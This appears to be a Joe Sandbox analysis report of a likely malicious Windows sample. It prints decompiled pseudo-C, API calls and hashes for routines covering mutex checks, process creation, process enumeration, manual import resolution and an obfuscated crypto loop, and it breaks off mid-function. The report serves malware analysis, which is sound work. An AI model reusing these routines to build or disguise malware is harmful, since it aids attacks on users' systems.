Associated: 00000006.00000002.1665960258.00D00000.00000002.sdmp Download File
Associated: 00000006.00000002.1665970652.00D04000.00000002.sdmp Download File
Associated: 00000006.00000002.1665987296.00D1E000.00000004.sdmp Download File
Associated: 00000006.00000002.1665992596.00D21000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d00000_810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae729c5169e83115aea303738f4259c5d43c66b355e9467007d57c1a8ae589fd
Instruction ID: 4d9879f9f7cf7542f8173fa97b73ae5b64d531b5f4ebd0387282f655b3928f74
Opcode Fuzzy Hash: ae729c5169e83115aea303738f4259c5d43c66b355e9467007d57c1a8ae589fd
Instruction Fuzzy Hash: BA11D3769083108F8704CF29D44044AFBE5EFC8764F158A5EF8A8A7361DB70EA05CF96

Uniqueness

Uniqueness Score: 0.00%

Function 0040103C, Relevance: 10.5, APIs: 7, Instructions: 49
memorysynchronizationCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E0040103C(void* __esi, void* __eflags) {
				void* _t30;
				void* _t37;
				void* _t49;
				long _t54;
				void* _t65;
				void* _t66;
				int _t73;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t87;

				 *(_t83 - 4) = 0;
				 *((intOrPtr*)(_t83 - 8)) = GetCurrentProcessId();
				_t73 = 0; // executed
				L00401BE0(E00401000, _t83 - 4); // executed
				_t4 = _t73 + 0x14; // 0x14
				_t72 = _t4;
				_t69 = 0x412000;
				_t76 = L00401D00(0x412000, _t4, 0);
				 *0x4159dc(_t83 - 0x118, 0x40, _t76,  *(_t83 - 4), 0x64da9f26);
				_t87 = _t85 + 0x14;
				HeapFree(GetProcessHeap(), 0, _t76);
				_t30 = CreateMutexW(0, 1, _t83 - 0x118); // executed
				_t65 = _t30;
				if(_t65 == 0) {
					L6:
					goto 0x420045;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t77 = L00401D00(_t69, _t72, _t73);
					 *0x4159dc(_t83 - 0x118, 0x40, _t77,  *((intOrPtr*)(_t83 - 8)));
					HeapFree(GetProcessHeap(), 0, _t77);
					_t37 = CreateMutexW(0, 1, _t83 - 0x118); // executed
					_t66 = _t37;
					if(_t66 != 0) {
						goto 0x420062;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t79 = L00401D00(_t69, _t72, _t73);
						 *0x4159dc(_t83 - 0x98, 0x40, _t79,  *((intOrPtr*)(_t83 - 8)));
						HeapFree(GetProcessHeap(), 0, _t79);
						_t80 = CreateEventW(0, 1, 0, _t83 - 0x98);
						if(_t80 != 0) {
							goto 0x42007f;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							GetModuleFileNameW();
							_push(_t83 - 0x18);
							_push(0x80);
							_t49 = L00401E80(_t80); // executed
							if(_t49 != 0) {
								WaitForSingleObject(_t80, 0xffffffff); // executed
								CloseHandle( *(_t83 - 0x18));
								CloseHandle( *(_t83 - 0x14));
							}
							CloseHandle(_t80);
						}
						CloseHandle(_t66);
					}
				} else {
					_t54 = GetLastError();
					if(_t54 == 0xb7) {
						_t72 = _t54 + 0x1d;
						_t69 = 0x412020;
						_t81 = L00401D00(0x412020, _t54 + 0x1d, 0);
						 *0x4159dc(_t83 - 0x98, 0x40, _t81,  *(_t83 - 4));
						_t87 = _t87 + 0x14;
						HeapFree(GetProcessHeap(), 0, _t81);
						_t82 = CreateEventW(0, 1, 0, _t83 - 0x98);
						if(_t82 != 0) {
							SetEvent(_t82);
							CloseHandle(_t82);
							_t73 = 1;
						}
					}
					CloseHandle(_t65);
					if(_t73 == 0) {
						goto L6;
					}
				}
				return _t73;
			}

0x0040103c
0x0040104c
0x00401054
0x00401056
0x00401060
0x00401060
0x00401063
0x00401070
0x0040107f
0x00401085
0x00401091
0x004010a1
0x004010a7
0x004010ab
0x00401133
0x00401133
0x00401138
0x00401139
0x0040113a
0x0040113b
0x0040113c
0x0040113d
0x0040113e
0x0040113f
0x00401140
0x00401141
0x0040114a
0x00401159
0x0040116c
0x0040117d
0x00401183
0x00401187
0x0040118d
0x00401192
0x00401193
0x00401194
0x00401195
0x00401196
0x00401197
0x00401198
0x00401199
0x0040119a
0x0040119b
0x004011a4
0x004011b3
0x004011c6
0x004011df
0x004011e3
0x004011e5
0x004011ea
0x004011eb
0x004011ec
0x004011ed
0x004011ee
0x004011ef
0x004011f0
0x004011f1
0x004011f2
0x004011f3
0x004011fc
0x004011fd
0x00401208
0x00401212
0x00401217
0x00401220
0x00401229
0x00401229
0x00401230
0x00401230
0x00401237
0x00401237
0x004010b1
0x004010b1
0x004010bc
0x004010c3
0x004010c6
0x004010d3
0x004010e2
0x004010e8
0x004010f4
0x0040110b
0x0040110f
0x00401112
0x00401119
0x0040111f
0x0040111f
0x0040110f
0x00401125
0x0040112d
0x00000000
0x00000000
0x0040112d
0x00401245

APIs

GetCurrentProcessId.KERNEL32 ref: 00401043
_snwprintf.NTDLL ref: 0040107F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040108A
HeapFree.KERNEL32(00000000), ref: 00401091
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 004010A1
GetLastError.KERNEL32 ref: 004010B1
CloseHandle.KERNEL32(00000000), ref: 00401125

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: HeapProcess$CloseCreateCurrentErrorFreeHandleLastMutex_snwprintf
String ID:
API String ID: 2918715589-0
Opcode ID: e3ff44923a0a81c08c9d081656b4ca357a7d5858b1bb0eab9925d428aeb0d767
Instruction ID: a3dd0a95254582dbe09196792adc4e813d3e055c484ce3b897a36d87a29534cd
Opcode Fuzzy Hash: e3ff44923a0a81c08c9d081656b4ca357a7d5858b1bb0eab9925d428aeb0d767
Instruction Fuzzy Hash: 1D012871A00205EBDB119BE1EC48BEE77B9EBC4346F0080B7F609E2291DF3959418B5E

Uniqueness

Uniqueness Score: 3.75%

Function 004011F3, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E004011F3(void* __edi) {
				void* __esi;
				void* _t7;
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				_t17 = __edi;
				GetModuleFileNameW(??, ??, ??);
				_push(_t21 - 0x18);
				_push(0x80);
				_t7 = L00401E80(_t19); // executed
				if(_t7 != 0) {
					WaitForSingleObject(_t19, 0xffffffff); // executed
					CloseHandle( *(_t21 - 0x18));
					CloseHandle( *(_t21 - 0x14));
				}
				CloseHandle(_t19);
				CloseHandle(_t14);
				return _t17;
			}

0x004011f3
0x004011f3
0x004011fc
0x004011fd
0x00401208
0x00401212
0x00401217
0x00401220
0x00401229
0x00401229
0x00401230
0x00401237
0x00401245

APIs

GetModuleFileNameW.KERNEL32 ref: 004011F3
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401217
CloseHandle.KERNEL32(?), ref: 00401220
CloseHandle.KERNEL32(?), ref: 00401229
CloseHandle.KERNEL32 ref: 00401230
CloseHandle.KERNEL32 ref: 00401237

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: 0cf1946aae266f9fdc1cd8e59b4b49908c78bab0745a9e2296892ab34f963bdf
Instruction ID: f5d7fb7809c6cd94d8b0a3663de213ad70a8427688e3495ea3d09f9a43a47399
Opcode Fuzzy Hash: 0cf1946aae266f9fdc1cd8e59b4b49908c78bab0745a9e2296892ab34f963bdf
Instruction Fuzzy Hash: A6E03973600016EBCF006BA6FD099EE7B38EB88712F008572FA05E01B0DB3949058BA9

Uniqueness

Uniqueness Score: 0.01%

Function 00401E91, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38
processCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00401E91(WCHAR* __esi) {
				int _t11;
				void* _t20;

				memset();
				 *(_t20 - 0x58) = 0x44;
				_t11 = CreateProcessW(__esi, 0, 0, 0, 0,  *(_t20 + 8), 0, 0, _t20 - 0x58, _t20 - 0x10); // executed
				if(_t11 == 0) {
					goto 0x4205fe;
					asm("int3");
					return _t11;
				} else {
					if( *((intOrPtr*)(_t20 + 0xc)) == 0) {
						CloseHandle( *(_t20 - 0x10));
						CloseHandle( *(_t20 - 0xc));
						return 1;
					} else {
						asm("movdqu xmm0, [ebp-0x10]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x00401e91
0x00401e9a
0x00401eb9
0x00401ec1
0x00401ef9
0x00401efe
0x00401eff
0x00401ec3
0x00401ec8
0x00401ee0
0x00401ee9
0x00401ef8
0x00401eca
0x00401eca
0x00401ecf
0x00401edc
0x00401edc
0x00401ec8

APIs

memset.NTDLL ref: 00401E91
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00401EB9
CloseHandle.KERNEL32(?), ref: 00401EE0
CloseHandle.KERNEL32(?), ref: 00401EE9

Strings

D, xrefs: 00401E9A

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 9962feb8c0ce0acb09506696145ddc25268471e6dc95c3502a95e884e1752bf3
Instruction ID: b82e513aa120c2900f482dd88beb0009229b4648eb167eb23b61d6246eaab8f9
Opcode Fuzzy Hash: 9962feb8c0ce0acb09506696145ddc25268471e6dc95c3502a95e884e1752bf3
Instruction Fuzzy Hash: F7F06271A40248EBEB214FD9EC05BED7778FB44700F108566FE08A92D0D7B995508799

Uniqueness

Uniqueness Score: 0.08%

Function 00401142, Relevance: 6.0, APIs: 4, Instructions: 31
memorysynchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 00401159
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401165
HeapFree.KERNEL32(00000000), ref: 0040116C
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0040117D

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$CreateFreeMutexProcess_snwprintf
String ID:
API String ID: 3932063178-0
Opcode ID: 4e7be1a19b6fcfa1234bac2cc59fc400e31e87079947fd1bf200bf565477fe75
Instruction ID: b737d66a9f8e337c55488bc20d0e923c4e96ef791b34b1a7a3343a33a1af3172
Opcode Fuzzy Hash: 4e7be1a19b6fcfa1234bac2cc59fc400e31e87079947fd1bf200bf565477fe75
Instruction Fuzzy Hash: A6F0E5B2B00218ABDB1017E5BC4ABDE3B68EB84316F0040B2F70DE5191D97685148BAA

Uniqueness

Uniqueness Score: 3.75%

Function 003E2493, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 29
stringCOMMON

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpW.KERNELBASE ref: 003E24E5

Strings

_E9e3X1YKeRS, xrefs: 003E24B8, 003E24C0
ov8oTdn, xrefs: 003E24B2, 003E24C7

Memory Dump Source

Source File: 00000006.00000002.1665362064.003E0000.00000040.sdmp, Offset: 003E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3e0000_810.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: d69e894cb54c93b1cdefd85ef72f4f56b805f83c370dc09919bc6995c7b2b8d9
Instruction ID: a595da1d2a9d702107b78804d727ef1fb4c4dfaede2a0b67d49ffbd0f8a23d6b
Opcode Fuzzy Hash: d69e894cb54c93b1cdefd85ef72f4f56b805f83c370dc09919bc6995c7b2b8d9
Instruction Fuzzy Hash: 70F049B5D01668CFC726DF65E881649BBF8BB48318F004AAACA49AB3D0D7306954CF85

Uniqueness

Uniqueness Score: 0.21%

Function 00401C07, Relevance: 3.0, APIs: 2, Instructions: 10
COMMON

Control-flow Graph

Executed
Not Executed

APIs

Process32FirstW.KERNEL32 ref: 00401C13
CloseHandle.KERNEL32 ref: 00401C51

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CloseFirstHandleProcess32
String ID:
API String ID: 917458368-0
Opcode ID: 70666b63a014b8eb4de91f8758d014796102c1ebaa84a711e933e40a0d597f76
Instruction ID: 19cda48b30d1cf69e2058a27b7b386ffe8fc7e2c47c58f6e7feabc831b3ae505
Opcode Fuzzy Hash: 70666b63a014b8eb4de91f8758d014796102c1ebaa84a711e933e40a0d597f76
Instruction Fuzzy Hash: 78C08070105030F6D7015F617C0C9FF3578AF44341F10C012F002D0051C73C85415D5E

Uniqueness

Uniqueness Score: 0.01%

Function 00401C38, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Control-flow Graph

Executed
Not Executed

APIs

Process32NextW.KERNEL32 ref: 00401C38
CloseHandle.KERNEL32 ref: 00401C51

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CloseHandleNextProcess32
String ID:
API String ID: 4007157957-0
Opcode ID: b3c2953ba96212824fcceaab5521cdb04f9cf596e404a9b391245534d688c652
Instruction ID: 25e0327e516a6bc0ba322ad65879f55a3b368314abd543ec748f50244d348881
Opcode Fuzzy Hash: b3c2953ba96212824fcceaab5521cdb04f9cf596e404a9b391245534d688c652
Instruction Fuzzy Hash: FAB0922020A020E797005B2178089AA26A46940741395C423F007D4061DB3CC592BDAE

Uniqueness

Uniqueness Score: 0.01%

Function 00D02FB8, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

APIs

GetBinaryTypeW.KERNEL32 ref: 00D03083

Memory Dump Source

Source File: 00000006.00000001.1653736551.00D01000.00000020.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000006.00000001.1653706836.00D00000.00000002.sdmp Download File
Associated: 00000006.00000001.1653764365.00D04000.00000002.sdmp Download File
Associated: 00000006.00000001.1654157847.00D1E000.00000004.sdmp Download File
Associated: 00000006.00000001.1654172074.00D21000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_d00000_810.jbxd

Similarity

API ID: BinaryType
String ID:
API String ID: 3726996659-0
Opcode ID: ea6632552bb15ac98aab52b44a680e32d50e5047d15bcb98b6762c7e5affcbe6
Instruction ID: ff20477d3f13c7290722dfc78ddb11a1c5df54de284b319db33567c87da84c57
Opcode Fuzzy Hash: ea6632552bb15ac98aab52b44a680e32d50e5047d15bcb98b6762c7e5affcbe6
Instruction Fuzzy Hash: 92319AB0D1525A9FDF04CFA8C8906FEBBB5AF09324F084459D498A7381D3319A41CBA5

Uniqueness

Uniqueness Score: 0.17%

Function 0040F5E0, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				L0040D340();
				L0040DF80(); // executed
				_t3 = L00401030(); // executed
				_t11 = _t3;
				if(_t3 != 0) {
					L0040CE80(_t5, _t6, _t7, _t8, _t11);
				}
				ExitProcess(0);
			}

0x0040f5e6
0x0040f5eb
0x0040f5f0
0x0040f5f5
0x0040f5f7
0x0040f5f9
0x0040f5f9
0x0040f600

APIs

ExitProcess.KERNEL32 ref: 0040F600

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 9d22004ec0eadc537b2b9b9e64fefe56178107cf51fdb82e9f9ff1fd399126af
Instruction ID: daab734696685340cfef0085648967af769e36f34ac2b86bcb7081dbb8dcad03
Opcode Fuzzy Hash: 9d22004ec0eadc537b2b9b9e64fefe56178107cf51fdb82e9f9ff1fd399126af
Instruction Fuzzy Hash: F0C01221611602A2D11433F60C0774A30080B40358F00023ABEA0A40E2AD78A04C80BF

Uniqueness

Uniqueness Score: 0.01%

Function 00D01247, Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON

APIs

VirtualAlloc.KERNELBASE ref: 00D012CC

Memory Dump Source

Source File: 00000006.00000001.1653736551.00D01000.00000020.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000006.00000001.1653706836.00D00000.00000002.sdmp Download File
Associated: 00000006.00000001.1653764365.00D04000.00000002.sdmp Download File
Associated: 00000006.00000001.1654157847.00D1E000.00000004.sdmp Download File
Associated: 00000006.00000001.1654172074.00D21000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_d00000_810.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 52a8c72165b6fd2171a97399d305e52e113de892bef639cbb02a99fd35a7e048
Instruction ID: 3e9aa7d9e1eb8b9c9a56d7ea44a5900be78e0949e2200dce3c6d4b36922a8864
Opcode Fuzzy Hash: 52a8c72165b6fd2171a97399d305e52e113de892bef639cbb02a99fd35a7e048
Instruction Fuzzy Hash: DA21A275D012198FCF08CF99C8816EEB7F2FF84304F148419D859A7351DA34A941CBE4

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Function 00D0257B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99memoryUNIQUE

APIs

RemoveFontMemResourceEx.GDI32 ref: 00D02612
AllocateUserPhysicalPages.KERNEL32 ref: 00D0266F

Strings

[>}, xrefs: 00D02635

Memory Dump Source

Source File: 00000006.00000002.1665965007.00D01000.00000020.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000006.00000002.1665960258.00D00000.00000002.sdmp Download File
Associated: 00000006.00000002.1665970652.00D04000.00000002.sdmp Download File
Associated: 00000006.00000002.1665987296.00D1E000.00000004.sdmp Download File
Associated: 00000006.00000002.1665992596.00D21000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d00000_810.jbxd

Similarity

API ID: AllocateFontPagesPhysicalRemoveResourceUser
String ID: [>}
API String ID: 2137002897-4040756927
Opcode ID: 3b363b267534ad049921f6bffd0fb7bdda558e8c445fef5e87d88f2e1269b10d
Instruction ID: 8d4832a4ba124771d5d7aa30f4caacecd27c7ef47b10ce368492d6a1a8edeedb
Opcode Fuzzy Hash: 3b363b267534ad049921f6bffd0fb7bdda558e8c445fef5e87d88f2e1269b10d
Instruction Fuzzy Hash: 7041E3B1D01219CBCF04DF98D8845AEFBB2FF88310B24852AD919BB354E770A945CBA5

Uniqueness

Uniqueness Score: 100.00%

Function 00401A36, Relevance: 3.1, APIs: 2, Instructions: 53
libraryloaderCOMMON

C-Code - Quality: 80%

			E00401A36(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t12;
				_Unknown_base(*)()* _t14;
				signed short _t15;
				CHAR* _t17;
				intOrPtr* _t19;
				intOrPtr _t20;
				struct HINSTANCE__* _t22;
				_Unknown_base(*)()** _t25;
				signed short* _t28;
				void* _t29;
				signed short _t34;

				_t20 = __ecx;
				_t12 =  *((intOrPtr*)(__edx + 0x80));
				 *((intOrPtr*)(_t29 - 4)) = __ecx;
				if(_t12 == 0 ||  *((intOrPtr*)(__edx + 0x84)) == 0) {
					L12:
					goto 0x420429;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return _t12;
				} else {
					_t19 = _t12 + __ecx;
					_t12 =  *((intOrPtr*)(_t19 + 0xc));
					if(_t12 == 0) {
						goto L12;
					} else {
						while(1) {
							_t14 = LoadLibraryA(_t12 + _t20);
							_t22 = _t14;
							 *(_t29 - 8) = _t22;
							if(_t22 == 0) {
								break;
							}
							_t20 =  *((intOrPtr*)(_t29 - 4));
							_t28 =  *_t19 + _t20;
							_t25 =  *((intOrPtr*)(_t19 + 0x10)) + _t20;
							_t15 =  *_t28;
							_t34 = _t15;
							if(_t34 == 0) {
								L11:
								_t12 =  *((intOrPtr*)(_t19 + 0x20));
								_t19 = _t19 + 0x14;
								if(_t12 != 0) {
									continue;
								} else {
									goto L12;
								}
							} else {
								L6:
								L6:
								if(_t34 >= 0) {
									_t17 = _t15 + 2 + _t20;
								} else {
									_t17 = _t15 & 0x0000ffff;
								}
								_t14 = GetProcAddress(_t22, _t17);
								if(_t14 == 0) {
									break;
								}
								_t20 =  *((intOrPtr*)(_t29 - 4));
								_t28 =  &(_t28[2]);
								_t22 =  *(_t29 - 8);
								 *_t25 = _t14;
								_t25 = _t25 + 4;
								_t15 =  *_t28;
								if(_t15 != 0) {
									goto L6;
								} else {
									goto L11;
								}
							}
							goto L14;
						}
						goto 0x420442;
						asm("int3");
						asm("int3");
						asm("int3");
						return _t14;
					}
				}
				L14:
			}

0x00401a36
0x00401a36
0x00401a3c
0x00401a44
0x00401aba
0x00401aba
0x00401abf
0x00401ac0
0x00401ac1
0x00401ac2
0x00401ac3
0x00401ac4
0x00401ac5
0x00401a4f
0x00401a4f
0x00401a52
0x00401a57
0x00000000
0x00401a60
0x00401a60
0x00401a63
0x00401a69
0x00401a6b
0x00401a70
0x00000000
0x00000000
0x00401a74
0x00401a7a
0x00401a7c
0x00401a7e
0x00401a80
0x00401a82
0x00401ab0
0x00401ab0
0x00401ab3
0x00401ab8
0x00000000
0x00000000
0x00000000
0x00000000
0x00401a84
0x00000000
0x00401a84
0x00401a84
0x00401a8e
0x00401a86
0x00401a86
0x00401a86
0x00401a92
0x00401a9a
0x00000000
0x00000000
0x00401a9c
0x00401a9f
0x00401aa2
0x00401aa5
0x00401aa7
0x00401aaa
0x00401aae
0x00000000
0x00000000
0x00000000
0x00000000
0x00401aae
0x00000000
0x00401a82
0x00401ac6
0x00401acb
0x00401acc
0x00401acd
0x00401ace
0x00401ace
0x00401a57
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 00401A63
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00401A92

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 04a1d943b65991fe969ea4202f65db8a2a811099714c2d517eef6e02328ec427
Instruction ID: 90bdcf9fa406b2ff669bf5c9d6d0196f8d0897b6d7fcd5169f3926b2a282f2b8
Opcode Fuzzy Hash: 04a1d943b65991fe969ea4202f65db8a2a811099714c2d517eef6e02328ec427
Instruction Fuzzy Hash: C1115AB1B012029FEB24CF58C880BA673A5BF40354F28417AEC45E7392E738ED41CA68

Uniqueness

Uniqueness Score: 0.02%

Function 003E2513, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

APIs

GetProcessHeap.KERNEL32 ref: 003E2539

Strings

dIoqrpDC, xrefs: 003E2561, 003E256B

Memory Dump Source

Source File: 00000006.00000002.1665362064.003E0000.00000040.sdmp, Offset: 003E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3e0000_810.jbxd

Similarity

API ID: HeapProcess
String ID: dIoqrpDC
API String ID: 54951025-856141598
Opcode ID: ab6a6d8823790cc208c0be3fa8f235383d15fc46db8afb222bdb67a3d602bc79
Instruction ID: 6cd5a36758f2de4b8386af903f46a0cbdfe92194895023ce239d8f0a4e37efba
Opcode Fuzzy Hash: ab6a6d8823790cc208c0be3fa8f235383d15fc46db8afb222bdb67a3d602bc79
Instruction Fuzzy Hash: 8E11D2B4E143658FDB69DF28D840749FBB5BB48310F1586E9C908AB380DB309E84CF91

Uniqueness

Uniqueness Score: 1.40%

Function 004053DF, Relevance: .5, Instructions: 487
COMMONCrypto

C-Code - Quality: 68%

			E004053DF(signed int __ebx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t595;
				signed int _t596;
				signed int _t598;
				void* _t599;
				signed int _t609;
				signed int* _t619;
				signed int _t622;
				signed int _t639;
				signed int _t641;
				signed int _t646;
				signed char _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				unsigned int _t693;
				signed int _t694;
				signed int _t696;
				signed int _t697;
				signed int _t701;
				signed int _t711;
				signed int _t716;
				signed int _t718;
				signed int _t721;
				signed int _t723;
				signed int _t724;
				intOrPtr _t736;
				intOrPtr _t737;
				intOrPtr _t738;
				signed int _t741;
				signed int _t745;
				void* _t751;
				signed int _t756;
				signed int _t758;
				signed int _t762;
				signed int _t766;
				signed int _t769;
				signed int _t773;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t795;
				signed int _t796;
				signed int _t798;
				signed int _t799;
				signed int _t806;
				signed int _t809;
				intOrPtr* _t811;
				void* _t812;
				signed int _t823;
				signed int _t825;
				intOrPtr _t827;
				signed int _t831;
				intOrPtr* _t833;
				signed int _t834;
				signed int _t842;
				signed int _t845;
				signed int _t848;
				signed int _t850;
				signed int _t851;
				signed int _t860;
				signed int _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				void* _t868;
				void* _t869;
				void* _t870;
				void* _t871;
				signed char _t872;
				signed char _t875;
				intOrPtr _t877;
				signed int _t880;
				signed int _t881;
				signed char _t883;
				signed int _t884;
				signed int _t885;
				signed char _t890;
				signed int _t892;
				void* _t893;
				signed int _t894;
				signed int _t897;
				signed int _t898;
				signed char _t899;
				intOrPtr _t901;
				intOrPtr _t903;
				void* _t906;
				signed char _t907;
				signed char _t908;
				signed int _t909;
				signed int _t913;
				signed char _t918;
				signed int _t919;
				signed int _t920;
				signed int _t923;
				signed int _t928;
				signed int _t932;
				signed char _t936;
				signed int _t937;
				signed char _t940;
				signed int _t941;
				signed int _t949;
				signed int _t964;
				signed int _t968;
				signed int _t970;
				signed int _t974;
				signed int* _t975;
				signed char* _t980;
				signed int _t981;
				signed int _t986;
				unsigned int _t987;
				signed int _t988;
				signed int _t989;
				signed int _t992;
				signed int _t993;
				signed int _t995;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				signed int _t1002;
				signed int _t1006;
				signed int _t1012;
				signed int _t1013;
				int _t1014;
				int _t1016;
				signed int _t1017;
				unsigned int _t1020;
				void* _t1024;
				intOrPtr _t1025;
				signed int _t1026;
				signed int _t1029;
				signed int _t1031;
				signed int _t1032;
				signed int _t1034;
				int _t1039;
				signed int _t1040;
				signed int _t1042;
				unsigned int _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				signed int _t1049;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed int _t1064;
				signed char _t1065;
				void* _t1066;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t1050 = __esi;
					_t1029 = __edi;
					_t846 = __ebx;
